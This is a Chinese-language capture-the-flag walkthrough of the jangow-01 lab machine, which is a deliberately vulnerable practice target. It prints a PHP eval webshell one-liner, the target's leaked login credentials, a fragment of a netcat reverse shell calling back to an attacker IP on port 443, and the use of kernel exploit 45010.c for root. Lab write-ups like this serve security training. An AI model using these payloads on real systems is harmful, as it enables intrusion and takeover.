jangow-01-1.0.1靶机


1.使用nmap扫描靶机地址

nmap -p 1-65535 -A -sV 192.168.1.139

发现开放了21和80端口,查看一下80端口。

2.收集网站信息

检查页面后发现Buscar页面有个可疑的地方:

做一下测试:

发现可以执行系统指令。

二、漏洞攻击

直接写入一句话木马试一下:

echo ‘<?php eval($_POST[“sain”]);’ > sain.php

返回200,用蚁剑链接一下:

连接成功。简单查看一下文件,在/var/www/html/site/wordpress下也发现了配置文件:

除此之外发现在/var/www/html下有一个./backup文件:

发现都是数据库的用户名和密码,但是jangow01和系统名字一样,所以我就尝试下直接登录系统,发现可以直接登陆进去:

username = “jangow01”

password = “abygurl69”

可以直接在系统里进行提权做,但是通常是写入反弹shell连接,然后发现 nc 中的 -e 参数无法使用

除此之外也尝试了好几种反弹shell,发现存在端口限制,试了好几个端口后发现443端口能用,因为网站使用的是php语言,所以写入一个php反弹shell文件:

&1nc 192.168.1.130 443 >/tmp/f');?>

kali上开启监听,并且访问 反弹shell的php文件:

发现连接成功,写入交互式shell:

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

升级一下 shell。在home目录下发现一个user.txt文件:

用md5解不出来,然后查看一下系统版本,看看有没有可利用的漏洞:

三、提权

靶机环境是ubuntu16.04,使用 searchsploit 看看有没有什么可利用的漏洞

试了好几个后发现 45010.c 可以利用,把45010.c文件传送到靶机中,我这开个http服务:

如果失败可以尝试把文件上传在蚁剑

赋一下权限(一开始我用的 jangow01 用户做的,发现无法赋权,后来试了下 www-data 可以):

先用 gcc 运行一下45010.c文件:

生成一个 a.out 文件,运行a.out文件,得到root权限,查看flag:


文章作者: Pikachu
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Pikachu !
作者: Pikachu
  目录